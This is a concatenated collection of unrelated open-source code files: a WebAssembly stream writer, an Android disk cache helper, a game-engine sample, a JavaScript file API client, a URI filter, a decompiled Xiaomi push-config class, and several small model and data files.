"console_scripts":
["aptly-ctl = aptly_ctl.application:main"]
},
classifiers=[
"Development Status :: 3 - Alpha",
"Programming Language :: Python :: 3 :: Only",
"Environment :: Console",
"License :: OSI Approved :: MIT License",
]
)
|
rekhadpr/demoazure1
|
lib/wabt/src/stream.cc
|
<reponame>rekhadpr/demoazure1
/*
* Copyright 2016 WebAssembly Community Group participants
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include "stream.h"
#include <cassert>
#include <cctype>
#define DUMP_OCTETS_PER_LINE 16
#define DUMP_OCTETS_PER_GROUP 2
namespace wabt {
Stream::Stream(Writer* writer, Stream* log_stream)
: writer_(writer),
offset_(0),
result_(Result::Ok),
log_stream_(log_stream) {}
void Stream::AddOffset(ssize_t delta) {
offset_ += delta;
}
void Stream::WriteDataAt(size_t at,
const void* src,
size_t size,
const char* desc,
PrintChars print_chars) {
if (WABT_FAILED(result_))
return;
if (log_stream_) {
log_stream_->WriteMemoryDump(src, size, at, nullptr, desc, print_chars);
}
result_ = writer_->WriteData(at, src, size);
}
void Stream::WriteData(const void* src,
size_t size,
const char* desc,
PrintChars print_chars) {
WriteDataAt(offset_, src, size, desc, print_chars);
offset_ += size;
}
void Stream::MoveData(size_t dst_offset, size_t src_offset, size_t size) {
if (WABT_FAILED(result_))
return;
if (log_stream_) {
log_stream_->Writef(
"; move data: [%" PRIzx ", %" PRIzx ") -> [%" PRIzx ", %" PRIzx ")\n",
src_offset, src_offset + size, dst_offset, dst_offset + size);
}
result_ = writer_->MoveData(dst_offset, src_offset, size);
}
void Stream::Writef(const char* format, ...) {
WABT_SNPRINTF_ALLOCA(buffer, length, format);
WriteData(buffer, length);
}
void Stream::WriteMemoryDump(const void* start,
size_t size,
size_t offset,
const char* prefix,
const char* desc,
PrintChars print_chars) {
const uint8_t* p = static_cast<const uint8_t*>(start);
const uint8_t* end = p + size;
while (p < end) {
const uint8_t* line = p;
const uint8_t* line_end = p + DUMP_OCTETS_PER_LINE;
if (prefix)
Writef("%s", prefix);
Writef("%07" PRIzx ": ", reinterpret_cast<intptr_t>(p) -
reinterpret_cast<intptr_t>(start) + offset);
while (p < line_end) {
for (int i = 0; i < DUMP_OCTETS_PER_GROUP; ++i, ++p) {
if (p < end) {
Writef("%02x", *p);
} else {
WriteChar(' ');
WriteChar(' ');
}
}
WriteChar(' ');
}
if (print_chars == PrintChars::Yes) {
WriteChar(' ');
p = line;
for (int i = 0; i < DUMP_OCTETS_PER_LINE && p < end; ++i, ++p)
WriteChar(isprint(*p) ? *p : '.');
}
/* if there are multiple lines, only print the desc on the last one */
if (p >= end && desc)
Writef(" ; %s", desc);
WriteChar('\n');
}
}
MemoryStream::MemoryStream() : Stream(&writer_) {}
FileStream::FileStream(const char* filename)
: Stream(&writer_), writer_(filename) {}
FileStream::FileStream(FILE* file) : Stream(&writer_), writer_(file) {}
// static
std::unique_ptr<FileStream> FileStream::CreateStdout() {
return std::unique_ptr<FileStream>(new FileStream(stdout));
}
// static
std::unique_ptr<FileStream> FileStream::CreateStderr() {
return std::unique_ptr<FileStream>(new FileStream(stderr));
}
} // namespace wabt
|
chenhongs/personal_maven
|
resource/src/main/java/com/ch/android/resource/model/DiskHelper.java
|
<gh_stars>1-10
package com.ch.android.resource.model;
import android.content.Context;
import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import com.ch.android.resource.util.LogUtils;
import com.google.gson.Gson;
import java.io.BufferedOutputStream;
import java.io.BufferedReader;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.FileReader;
import java.io.FileWriter;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
public class DiskHelper {
private static final String TAG = "DiskHelper";
private static DiskHelper sDefault;
private Context mContext;
private DiskHelper(Context context) {
mContext = context;
}
public static DiskHelper getDefault(Context context) {
if (sDefault == null) {
synchronized (DiskHelper.class) {
if (sDefault == null) {
sDefault = new DiskHelper(context);
}
}
}
return sDefault;
}
public Bitmap readBitmap(String path) {
File file = new File(path);
if (!file.exists()) {
return null;
}
FileInputStream fos = null;
try {
fos = new FileInputStream(file);
return BitmapFactory.decodeStream(fos);
} catch (FileNotFoundException e) {
e.printStackTrace();
} finally {
if (fos != null) {
try {
fos.close();
} catch (IOException e) {
e.printStackTrace();
}
}
}
return null;
}
public void saveBitmap(String path, Bitmap bitmap) {
File file = new File(path);
if (!file.exists()) {
try {
file.createNewFile();
} catch (IOException e) {
LogUtils.e(TAG, "saveBitmap >> error:" + e.getClass().getSimpleName());
e.printStackTrace();
return;
}
}
File tmpFile = new File(file.getParent(), file.getName() + ".tmp");
if (!tmpFile.exists()) {
try {
tmpFile.createNewFile();
} catch (IOException e) {
LogUtils.e(TAG, "saveBitmap >> error:" + e.getClass().getSimpleName());
e.printStackTrace();
return;
}
}
boolean success = true;
BufferedOutputStream bos = null;
try {
bos = new BufferedOutputStream(new FileOutputStream(tmpFile));
bitmap.compress(Bitmap.CompressFormat.PNG, 100, bos);
bos.flush();
} catch (FileNotFoundException e) {
success = false;
e.printStackTrace();
} catch (IOException e) {
success = false;
e.printStackTrace();
} finally {
if (bos != null) {
try {
bos.close();
} catch (IOException e) {
success = false;
e.printStackTrace();
}
}
}
if (success) {
// 临时文件改名字
tmpFile.renameTo(file);
} else {
// 删除文件和临时文件
file.delete();
tmpFile.delete();
}
}
public <T> T readObject(String filePath) {
File file = new File(filePath);
if (!file.exists()) {
return null;
}
ObjectInputStream ois = null;
try {
FileInputStream fis = new FileInputStream(file);
ois = new ObjectInputStream(fis);
return (T) ois.readObject();
} catch (FileNotFoundException e) {
LogUtils.e(TAG, "writeObject >> error:" + e.getClass().getSimpleName());
e.printStackTrace();
} catch (IOException e) {
LogUtils.e(TAG, "writeObject >> error:" + e.getClass().getSimpleName());
e.printStackTrace();
} catch (ClassNotFoundException e) {
LogUtils.e(TAG, "writeObject >> error:" + e.getClass().getSimpleName());
e.printStackTrace();
} finally {
if (ois != null) {
try {
ois.close();
} catch (IOException e) {
e.printStackTrace();
}
}
}
return null;
}
public <T extends Serializable> void writeObject(T object, String filePath) {
File file = new File(filePath);
if (!file.exists()) {
try {
file.createNewFile();
} catch (IOException e) {
LogUtils.e(TAG, "writeObject >> createNewFile failed.");
e.printStackTrace();
}
}
ObjectOutputStream oos = null;
try {
FileOutputStream fos = new FileOutputStream(file);
oos = new ObjectOutputStream(fos);
oos.writeObject(object);
} catch (FileNotFoundException e) {
LogUtils.e(TAG, "writeObject >> error:" + e.getClass().getSimpleName());
e.printStackTrace();
} catch (IOException e) {
LogUtils.e(TAG, "writeObject >> error:" + e.getClass().getSimpleName());
e.printStackTrace();
} finally {
if (oos != null) {
try {
oos.close();
} catch (IOException e) {
e.printStackTrace();
}
}
}
}
public void writeObjectWithGson(Object o, String filePath) {
File file = new File(filePath);
if (!file.exists()) {
try {
file.createNewFile();
} catch (IOException e) {
LogUtils.e(TAG, "writeObjectWithGson >> createNewFile failed.");
e.printStackTrace();
}
}
Gson gson = new Gson();
String str = gson.toJson(o);
FileWriter fw = null;
try {
fw = new FileWriter(file);
fw.write(str);
fw.flush();
} catch (IOException e) {
LogUtils.e(TAG, "writeObjectWithGson >> error:" + e.getClass().getSimpleName());
e.printStackTrace();
} finally {
if (fw != null) {
try {
fw.close();
} catch (IOException e) {
e.printStackTrace();
}
}
}
}
public <T> T readObjectWithGson(String filePath, Class<T> classOfT) {
File file = new File(filePath);
if (!file.exists()) {
return null;
}
StringBuffer sb = new StringBuffer();
BufferedReader br = null;
try {
FileReader fr = new FileReader(file);
br = new BufferedReader(fr);
String s = null;
while ((s = br.readLine()) != null) {
sb.append(s).append('\n');
}
} catch (FileNotFoundException e) {
LogUtils.e(TAG, "readObjectWithGson >> error:" + e.getClass().getSimpleName());
e.printStackTrace();
} catch (IOException e) {
LogUtils.e(TAG, "readObjectWithGson >> error:" + e.getClass().getSimpleName());
e.printStackTrace();
}
String jsonStr = sb.toString();
Gson gson = new Gson();
return gson.fromJson(jsonStr, classOfT);
}
}
|
MateusMP/BitEngine
|
samples/sample01/src/Game/MyGame.h
|
#pragma once
#include <imgui.h>
#include <BitEngine/Core/VideoSystem.h>
#include <BitEngine/Core/Graphics/Sprite2D.h>
#include <BitEngine/Game/ECS/EntitySystem.h>
#include "Game/Common/MainMemory.h"
#include "Game/Common/GameGlobal.h"
#include "Overworld.h"
class UserGUI
{
public:
UserGUI(MyGameEntitySystem* es)
{
gui = es->createEntity();
camera = es->addComponent<BitEngine::Camera2DComponent>(gui);
camera->setView(1280, 720);
camera->setLookAt(glm::vec3(1280 / 2, 720 / 2, 0));
camera->setZoom(1.0f);
}
BitEngine::ComponentRef<BitEngine::Camera2DComponent>& getCamera() {
return camera;
}
private:
BitEngine::EntityHandle gui;
BitEngine::ComponentRef<BitEngine::Camera2DComponent> camera;
};
void resourceLoaderMenu(const char* name, BitEngine::ResourceLoader* loader) {
constexpr float TO_MB = 1.0 / (1024 * 1024);
if (ImGui::TreeNode(name)) {
ImGui::TextColored(ImVec4(1, 1, 0, 1), "Resources pending load: %lu", loader->getPendingToLoad().size());
for (auto p : loader->getPendingToLoad()) {
if (ImGui::TreeNode(p.first->getNameId().c_str())) {
ImGui::TextColored(ImVec4(1, 1, 0, 1), "Task waiting for %lu dependencies", p.second->getDependencies().size());
ImGui::TreePop();
}
}
ImGui::TreePop();
}
}
class MyGame
{
public:
MyGame(MainMemory* gameMemory)
: commandListener(gameMemory->commandSystem->commandSignal, &MyGame::onMessage, this),
windowClosed(gameMemory->window->windowClosedSignal, &MyGame::onMessage, this),
imguiRender(*gameMemory->imGuiRender, &MyGame::onMessage, this),
mainMemory(gameMemory)
{
gameState = (GameState*)gameMemory->memory;
if (gameState->initialized) {
gameState->entitySystem->registerComponents();
} else {
gameState->clearColor = BitEngine::ColorRGBA(0.3f, 0.3f, 0.3f, 0.f);
}
}
~MyGame() {
}
void onMessage(const BitEngine::ImGuiRenderEvent& ev)
{
static bool active = true;
ImGui::Begin("Overview", &active, ImGuiWindowFlags_MenuBar);
ImGui::ColorEdit4("Clear Color", (float*)&gameState->clearColor);
if (ImGui::CollapsingHeader("Tasks"))
{
auto taskManager = mainMemory->taskManager;
// Display contents in a scrolling region
ImGui::TextColored(ImVec4(1, 1, 0, 1), "Tasks: %lu", taskManager->getTasks().size());
ImGui::BeginChild("Scrolling");
for (const BitEngine::TaskPtr& ptr : taskManager->getTasks()) {
ImGui::Text("Task, deps: %04lu", ptr->getDependencies().size());
}
ImGui::EndChild();
}
if (ImGui::CollapsingHeader("Resources"))
{
resourceLoaderMenu("Loader", mainMemory->loader);
}
ImGui::End();
}
void setupCommands(BitEngine::CommandSystem* cmdSys) {
cmdSys->registerKeyCommandForAllMods(RIGHT, GAMEPLAY, BE_KEY_RIGHT);
cmdSys->registerKeyCommandForAllMods(LEFT, GAMEPLAY, BE_KEY_LEFT);
cmdSys->registerKeyCommandForAllMods(UP, GAMEPLAY, BE_KEY_UP);
cmdSys->registerKeyCommandForAllMods(DOWN, GAMEPLAY, BE_KEY_DOWN);
cmdSys->RegisterMouseCommand(CLICK, GAMEPLAY, BE_MOUSE_BUTTON_LEFT, BitEngine::MouseAction::PRESS);
#ifdef _DEBUG
cmdSys->registerKeyboardCommand(RELOAD_SHADERS, -1, BE_KEY_R, BitEngine::KeyAction::PRESS, BitEngine::KeyMod::CTRL);
#endif
cmdSys->setCommandState(GAMEPLAY);
}
bool init()
{
BE_PROFILE_FUNCTION();
using namespace BitEngine;
// Create memory arenas
gameState->mainArena.init((u8*)mainMemory->memory + sizeof(GameState), mainMemory->memorySize - sizeof(GameState));
gameState->permanentArena.init((u8*)gameState->mainArena.alloc(MEGABYTES(8)), MEGABYTES(8));
gameState->entityArena.init((u8*)gameState->mainArena.alloc(MEGABYTES(64)), MEGABYTES(64));
gameState->resourceArena.init((u8*)gameState->mainArena.alloc(MEGABYTES(256)), MEGABYTES(256));
gameState->initialized = true;
setupCommands(mainMemory->commandSystem);
MemoryArena& permanentArena = gameState->permanentArena;
auto loader = mainMemory->loader;
loader->loadIndex("../data/main.idx");
// Init game state stuff
gameState->entitySystem = permanentArena.push<MyGameEntitySystem>(loader, &gameState->entityArena);
gameState->entitySystem->init();
gameState->m_userGUI = permanentArena.push<UserGUI>(gameState->entitySystem);
gameState->m_world = permanentArena.push<GameWorld>(mainMemory, gameState->entitySystem);
gameState->m_camera3d = permanentArena.push<PlayerCamera>(gameState->entitySystem);
gameState->m_world->setActiveCamera(gameState->m_camera3d->getCamera());
gameState->m_camera3d->setLookAt({ 0,0,0 });
gameState->m_camera3d->getTransform()->setPosition({ 50,0,300 });
// Tests
const RR<Texture> texture = loader->getResource<BitEngine::Texture>("texture.png");
const RR<Texture> texture2 = loader->getResource<BitEngine::Texture>("sun.png");
if (!texture.isValid() || !texture2.isValid()) {
return false;
}
LOG(GameLog(), BE_LOG_VERBOSE) << "Texture loaded: " << texture->getTextureID();
RR<Model> model = loader->getResource<Model>("rocks_model");
for (int i = 0; i < 4; ++i) {
auto entity = gameState->entitySystem->createEntity();
auto transform = gameState->entitySystem->addComponent<Transform3DComponent>(entity);
gameState->entitySystem->addComponent<RenderableMeshComponent>(entity, model);
transform->setPosition(-300 + i * 180, -20, -200);
}
RR<Sprite> spr1 = loader->getResource<BitEngine::Sprite>("data/sprites/spr_skybox");
RR<Sprite> spr2 = loader->getResource<BitEngine::Sprite>("data/sprites/spr_skybox_orbit");
RR<Sprite> spr3 = loader->getResource<BitEngine::Sprite>("data/sprites/spr_skybox_piece");
//BitEngine::SpriteHandle spr1 = loader->getResource<BitEngine::Sprite>("player", BitEngine::Sprite(texture, 128, 128, 0.5f, 0.5f, glm::vec4(0, 0, 1, 1)));
//BitEngine::SpriteHandle spr2 = sprMng->createSprite("playerOrbit", BitEngine::Sprite(texture, 640, 64, 0.5f, 0.0f, glm::vec4(0, 0, 1.0f, 1.0f)));
//BitEngine::SpriteHandle spr3 = sprMng->createSprite(BitEngine::Sprite(texture2, 256, 256, 0.5f, 0.5f, glm::vec4(0, 0, 2.0f, 2.0f), true));
// CREATE PLAYER
auto playerEntity = CreatePlayerTemplate(loader, gameState->entitySystem, mainMemory->commandSystem);
gameState->playerControl = gameState->entitySystem->getComponentRef<PlayerControlComponent>(playerEntity);
// Sparks
MyGameEntitySystem* es = gameState->entitySystem;
for (int i = 0; i < 9; ++i)
{
BitEngine::EntityHandle h = gameState->entitySystem->createEntity();
BitEngine::ComponentRef<BitEngine::Transform2DComponent> transformComp;
BitEngine::ComponentRef<BitEngine::Sprite2DComponent> spriteComp;
BitEngine::ComponentRef<BitEngine::SceneTransform2DComponent> sceneComp;
BitEngine::ComponentRef<BitEngine::GameLogicComponent> logicComp;
transformComp = es->addComponent<BitEngine::Transform2DComponent>(h);
spriteComp = es->addComponent<BitEngine::Sprite2DComponent>(h, 6, spr3, nullptr); // es->spr2D.getMaterial(Sprite2DRenderer::EFFECT_SPRITE)
sceneComp = es->addComponent<BitEngine::SceneTransform2DComponent>(h);
logicComp = es->addComponent<BitEngine::GameLogicComponent>(h);
es->addComponent<SpinnerComponent>(h, (rand() % 10) / 100.0f + 0.02f);
transformComp->setLocalPosition(i * 128 + 125, 500);
spriteComp->alpha = 1.0;
}
gameState->running = true;
return true;
}
bool32 update()
{
if (!gameState->initialized) {
init();
gameState->initialized = true;
}
gameState->entitySystem->destroyPending();
SpinnerSystem(gameState->entitySystem);
gameState->entitySystem->t2p.Process();
gameState->entitySystem->t3p.Process();
gameState->entitySystem->cam2Dprocessor.Process();
gameState->entitySystem->cam3Dprocessor.Process();
PlayerControlSystem(gameState->entitySystem);
mainMemory->taskManager->update();
mainMemory->loader->update();
// Render
if (gameState->running) {
render();
}
else {
gameState->entitySystem->~MyGameEntitySystem();
}
return gameState->running;
}
void onMessage(const BitEngine::WindowClosedEvent& msg) {
gameState->running = false;
}
void onMessage(const BitEngine::CommandSystem::MsgCommandInput& msg)
{
if (msg.commandID == RELOAD_SHADERS) {
LOG(BitEngine::EngineLog, BE_LOG_INFO) << "Reloading index";
gameState->resources->loadIndex("data/main.idx");
}
BitEngine::ComponentRef<PlayerControlComponent>& comp = gameState->playerControl;
switch (msg.commandID)
{
case RIGHT:
comp->movH = msg.intensity;
if (msg.action.fromButton == BitEngine::KeyAction::RELEASE)
comp->movH = 0;
break;
case LEFT:
comp->movH = -msg.intensity;
if (msg.action.fromButton == BitEngine::KeyAction::RELEASE)
comp->movH = 0;
break;
case UP:
comp->movV = msg.intensity;
if (msg.action.fromButton == BitEngine::KeyAction::RELEASE)
comp->movV = 0;
break;
case DOWN:
comp->movV = -msg.intensity;
if (msg.action.fromButton == BitEngine::KeyAction::RELEASE)
comp->movV = 0;
break;
case CLICK:
printf("CLICK!!!!\n\n");
break;
}
}
void render()
{
BE_PROFILE_FUNCTION();
SceneBeginCommand* sceneBegin = mainMemory->renderQueue->pushCommand<SceneBeginCommand>();
sceneBegin->renderWidth = sceneBegin->renderHeight = 0;
sceneBegin->color = gameState->clearColor;
gameState->entitySystem->mesh3dSys.processEntities(gameState->entitySystem, mainMemory->renderQueue, gameState->m_world->getActiveCamera());
Sprite2DProcessor::Process(gameState->entitySystem, gameState->m_userGUI->getCamera(), mainMemory->renderQueue);
}
void onMessage(const BitEngine::WindowResizedEvent& ev)
{
//mainMemory->videoSystem setViewPort(0, 0, ev.width, ev.height);
}
private:
BitEngine::Messenger<BitEngine::CommandSystem::MsgCommandInput>::ScopedSubscription commandListener;
BitEngine::Messenger<BitEngine::WindowClosedEvent>::ScopedSubscription windowClosed;
BitEngine::Messenger<BitEngine::ImGuiRenderEvent>::ScopedSubscription imguiRender;
MainMemory* mainMemory;
GameState* gameState;
};
|
Bryant-Wang24/jest
|
src/api/ProjectFile.js
|
<reponame>Bryant-Wang24/jest
import base from './base'
import axios from '@/utils/http'
import _axios from 'axios'
import { download } from '@/utils/common'
const ProjectFile = {
// 页面查询
getProjectFiles: params => {
return axios.post(`${base.hall}api/hall/rest/project/file/page`, params)
},
// 项目上传
uploadFile: params => {
return axios.post(`${base.hall}api/hall/rest/project/file/upload`, params)
},
// 类别配置
getTypeMenus: params => {
return axios.get(`${base.hall}api/hall/rest/project/file/moduleAndTypeInModuleConfigs`, params)
},
// 下载
download: id => {
_axios.get(`${base.hall}api/hall/rest/project/file/download/${id}`, { responseType: 'blob' }).then(res => {
download(res)
})
},
// 更新
update: params => {
return axios.put(`${base.hall}api/hall/rest/project/file/update`, params)
},
// 删除
deleteFile: params => {
return axios.put(`${base.hall}api/hall/rest/project/file/delete`, params)
}
}
export default ProjectFile
|
FiV0/BUbiNG
|
src/it/unimi/di/law/warc/filters/SchemeEquals.java
|
<reponame>FiV0/BUbiNG
package it.unimi.di.law.warc.filters;
/*
* Copyright (C) 2004-2017 <NAME>, <NAME>, and <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
import java.net.URI;
// RELEASE-STATUS: DIST
/** A filter accepting only URIs whose scheme equals a certain string (typically, <code>http</code>).
*
* <p>Note that {@link #apply(URI)} will throw an {@link IllegalArgumentException}
* if the argument has a {@code null} {@linkplain URI#getScheme() scheme}.
*/
public class SchemeEquals extends AbstractFilter<URI> {
/** The accepted scheme. */
private final String scheme;
/** Creates a filter that only accepts URIs with a given scheme.
*
* @param scheme the accepted scheme.
*/
public SchemeEquals(final String scheme) {
this.scheme = scheme;
}
/**
* Apply the filter to a given URI
*
* @param uri the URI to be filtered
* @return <code>true</code> if uri has scheme equals to the inner string
*/
@Override
public boolean apply(final URI uri) {
if (uri.getScheme() == null) throw new IllegalArgumentException("URI \"" + uri + "\" has no scheme");
return scheme.equals(uri.getScheme());
}
/**
* Get a new SchemeEquals accepting only URIs whose scheme equals the given string
*
* @param spec the scheme allowed
* @return A new SchemeEquals accepting only URIs whose scheme equals <code>spec</code>
*/
public static SchemeEquals valueOf(String spec) {
return new SchemeEquals(spec);
}
/**
* A string representation of this
*
* @return the scheme allowed by this filter
*/
@Override
public String toString() {
return toString(scheme);
}
/**
* Compare a given object with this
*
* @param x an object to be compared
* @return <code>true</code> if <code>x</code> is an instance of <code>SchemeEquals</code> and the scheme allowed by this is the same of the one allowed by <code>x</code>
*/
@Override
public boolean equals(Object x) {
if (x instanceof SchemeEquals) return ((SchemeEquals)x).scheme.equals(scheme);
else return false;
}
@Override
public int hashCode() {
return scheme.hashCode() ^ SchemeEquals.class.hashCode();
}
@Override
public Filter<URI> copy() {
return this;
}
}
|
gaoht/house
|
java/classes2/com/xiaomi/push/service/at.java
|
package com.xiaomi.push.service;
import android.content.Context;
import android.content.SharedPreferences;
import android.content.SharedPreferences.Editor;
import com.google.b.a.c;
import com.xiaomi.channel.commonutils.android.j;
import com.xiaomi.channel.commonutils.logger.b;
import com.xiaomi.channel.commonutils.misc.h.b;
import com.xiaomi.push.protobuf.a.a;
import com.xiaomi.push.protobuf.b.b;
import com.xiaomi.smack.util.e;
import java.io.BufferedOutputStream;
import java.util.ArrayList;
import java.util.List;
public class at
{
private static String a;
private static at e = new at();
private List<a> b = new ArrayList();
private a.a c;
private h.b d;
public static at a()
{
return e;
}
public static String e()
{
try
{
if (a == null)
{
localObject1 = j.a().getSharedPreferences("XMPushServiceConfig", 0);
a = ((SharedPreferences)localObject1).getString("DeviceUUID", null);
if (a == null)
{
a = j.b();
if (a != null) {
((SharedPreferences)localObject1).edit().putString("DeviceUUID", a).commit();
}
}
}
Object localObject1 = a;
return (String)localObject1;
}
finally {}
}
private void f()
{
if (this.c == null) {
h();
}
}
private void g()
{
if (this.d != null) {
return;
}
this.d = new au(this);
e.a(this.d);
}
/* Error */
private void h()
{
// Byte code:
// 0: new 102 java/io/BufferedInputStream
// 3: dup
// 4: invokestatic 52 com/xiaomi/channel/commonutils/android/j:a ()Landroid/content/Context;
// 7: ldc 104
// 9: invokevirtual 108 android/content/Context:openFileInput (Ljava/lang/String;)Ljava/io/FileInputStream;
// 12: invokespecial 111 java/io/BufferedInputStream:<init> (Ljava/io/InputStream;)V
// 15: astore_2
// 16: aload_2
// 17: astore_1
// 18: aload_0
// 19: aload_2
// 20: invokestatic 116 com/google/b/a/b:a (Ljava/io/InputStream;)Lcom/google/b/a/b;
// 23: invokestatic 121 com/xiaomi/push/protobuf/a$a:c (Lcom/google/b/a/b;)Lcom/xiaomi/push/protobuf/a$a;
// 26: putfield 37 com/xiaomi/push/service/at:c Lcom/xiaomi/push/protobuf/a$a;
// 29: aload_2
// 30: astore_1
// 31: aload_2
// 32: invokevirtual 124 java/io/BufferedInputStream:close ()V
// 35: aload_2
// 36: invokestatic 128 com/xiaomi/channel/commonutils/file/a:a (Ljava/io/InputStream;)V
// 39: aload_0
// 40: getfield 37 com/xiaomi/push/service/at:c Lcom/xiaomi/push/protobuf/a$a;
// 43: ifnonnull +14 -> 57
// 46: aload_0
// 47: new 118 com/xiaomi/push/protobuf/a$a
// 50: dup
// 51: invokespecial 129 com/xiaomi/push/protobuf/a$a:<init> ()V
// 54: putfield 37 com/xiaomi/push/service/at:c Lcom/xiaomi/push/protobuf/a$a;
// 57: return
// 58: astore_3
// 59: aconst_null
// 60: astore_2
// 61: aload_2
// 62: astore_1
// 63: new 131 java/lang/StringBuilder
// 66: dup
// 67: invokespecial 132 java/lang/StringBuilder:<init> ()V
// 70: ldc -122
// 72: invokevirtual 138 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 75: aload_3
// 76: invokevirtual 141 java/lang/Exception:getMessage ()Ljava/lang/String;
// 79: invokevirtual 138 java/lang/StringBuilder:append (Ljava/lang/String;)Ljava/lang/StringBuilder;
// 82: invokevirtual 144 java/lang/StringBuilder:toString ()Ljava/lang/String;
// 85: invokestatic 149 com/xiaomi/channel/commonutils/logger/b:a (Ljava/lang/String;)V
// 88: aload_2
// 89: invokestatic 128 com/xiaomi/channel/commonutils/file/a:a (Ljava/io/InputStream;)V
// 92: goto -53 -> 39
// 95: astore_2
// 96: aconst_null
// 97: astore_1
// 98: aload_1
// 99: invokestatic 128 com/xiaomi/channel/commonutils/file/a:a (Ljava/io/InputStream;)V
// 102: aload_2
// 103: athrow
// 104: astore_2
// 105: goto -7 -> 98
// 108: astore_3
// 109: goto -48 -> 61
// Local variable table:
// start length slot name signature
// 0 112 0 this at
// 17 82 1 localBufferedInputStream1 java.io.BufferedInputStream
// 15 74 2 localBufferedInputStream2 java.io.BufferedInputStream
// 95 8 2 localObject1 Object
// 104 1 2 localObject2 Object
// 58 18 3 localException1 Exception
// 108 1 3 localException2 Exception
// Exception table:
// from to target type
// 0 16 58 java/lang/Exception
// 0 16 95 finally
// 18 29 104 finally
// 31 35 104 finally
// 63 88 104 finally
// 18 29 108 java/lang/Exception
// 31 35 108 java/lang/Exception
}
private void i()
{
try
{
if (this.c != null)
{
BufferedOutputStream localBufferedOutputStream = new BufferedOutputStream(j.a().openFileOutput("XMCloudCfg", 0));
c localc = c.a(localBufferedOutputStream);
this.c.a(localc);
localc.a();
localBufferedOutputStream.close();
}
return;
}
catch (Exception localException)
{
b.a("save config failure: " + localException.getMessage());
}
}
void a(b.b paramb)
{
if ((paramb.i()) && (paramb.h() > c())) {
g();
}
try
{
a[] arrayOfa = (a[])this.b.toArray(new a[this.b.size()]);
int j = arrayOfa.length;
int i = 0;
while (i < j)
{
arrayOfa[i].a(paramb);
i += 1;
}
return;
}
finally {}
}
public void a(a parama)
{
try
{
this.b.add(parama);
return;
}
finally
{
parama = finally;
throw parama;
}
}
void b()
{
try
{
this.b.clear();
return;
}
finally
{
localObject = finally;
throw ((Throwable)localObject);
}
}
int c()
{
f();
if (this.c != null) {
return this.c.d();
}
return 0;
}
public a.a d()
{
f();
return this.c;
}
public static abstract class a
{
public void a(a.a parama) {}
public void a(b.b paramb) {}
}
}
/* Location: /Users/gaoht/Downloads/zirom/classes2-dex2jar.jar!/com/xiaomi/push/service/at.class
* Java compiler version: 6 (50.0)
* JD-Core Version: 0.7.1
*/
|
trumank/DRG-Mods
|
Source/FSD/Public/SaveGameStatePerkItem.h
|
<filename>Source/FSD/Public/SaveGameStatePerkItem.h
#pragma once
#include "CoreMinimal.h"
#include "SaveGameStatePerkItem.generated.h"
class UPerkAsset;
USTRUCT(BlueprintType)
struct FSaveGameStatePerkItem {
GENERATED_BODY()
public:
UPROPERTY(EditAnywhere, Transient)
uint8 Rank;
UPROPERTY(BlueprintReadWrite, EditAnywhere, Transient, meta=(AllowPrivateAccess=true))
UPerkAsset* Perk;
FSD_API FSaveGameStatePerkItem();
};
|
urirosenberg/cloudera-manager-api
|
src/main/java/com/axemblr/service/cm/models/hosts/MetricList.java
|
/*
* Copyright S.C. Axemblr Software Solutions S.R.L. (c) 2012.
*
* This file is subject to the terms and conditions defined in file
* 'LICENSE.txt', which is part of this source code package.
*/
package com.axemblr.service.cm.models.hosts;
import com.google.common.collect.ImmutableList;
import org.codehaus.jackson.annotate.JsonCreator;
import org.codehaus.jackson.annotate.JsonProperty;
import java.util.List;
/**
* A list of Metric objects.
* <br/>
* http://cloudera.github.com/cm_api/apidocs/v1/el_ns0_metricList.html
* http://cloudera.github.com/cm_api/apidocs/v1/ns0_apiMetricList.html
*/
public class MetricList {
private final ImmutableList<Metric> items;
@JsonCreator
public MetricList(@JsonProperty("items") List<Metric> items) {
this.items = (items == null) ? ImmutableList.<Metric>of() : ImmutableList.copyOf(items);
}
public ImmutableList<Metric> getItems() {
return items;
}
@Override
public boolean equals(Object o) {
if (this == o) return true;
if (!(o instanceof MetricList)) return false;
MetricList that = (MetricList) o;
if (items != null ? !items.equals(that.items) : that.items != null) return false;
return true;
}
@Override
public int hashCode() {
return items != null ? items.hashCode() : 0;
}
@Override
public String toString() {
return "MetricList{" +
"items=" + items +
'}';
}
}
|
bannama/gslb
|
src/main/java/com/oneops/gslb/mtd/v2/domain/CreateMtdBaseRequest.java
|
<gh_stars>0
package com.oneops.gslb.mtd.v2.domain;
import com.google.auto.value.AutoValue;
import com.google.gson.Gson;
import com.google.gson.TypeAdapter;
import com.google.gson.annotations.SerializedName;
@AutoValue
public abstract class CreateMtdBaseRequest {
@SerializedName("mtd_base")
public abstract MtdBaseRequest mtdBase();
public static CreateMtdBaseRequest create(MtdBaseRequest mtdBase) {
return new AutoValue_CreateMtdBaseRequest(mtdBase);
}
public static TypeAdapter<CreateMtdBaseRequest> typeAdapter(Gson gson) {
return new AutoValue_CreateMtdBaseRequest.GsonTypeAdapter(gson);
}
}
|
jaronheard/civic
|
packages/2018/src/assets/electionData.js
|
const electionData = [
{
category: "Influencers",
importance: 0.532761433,
sortOrder: 11
},
{
category: "$ Expenditures",
importance: 0.2577329977621656,
sortOrder: 10
},
{
category: "$ Received",
importance: 0.22949919907509095,
sortOrder: 9
},
{
category: "Primary Vote Count",
importance: 0.22878431536282723,
sortOrder: 8
},
{
category: "Grassroots",
importance: 0.12021850170825318,
sortOrder: 7
},
{
category: "Republican",
importance: 0.05830959262159894,
sortOrder: 6
},
{
category: "Democrat",
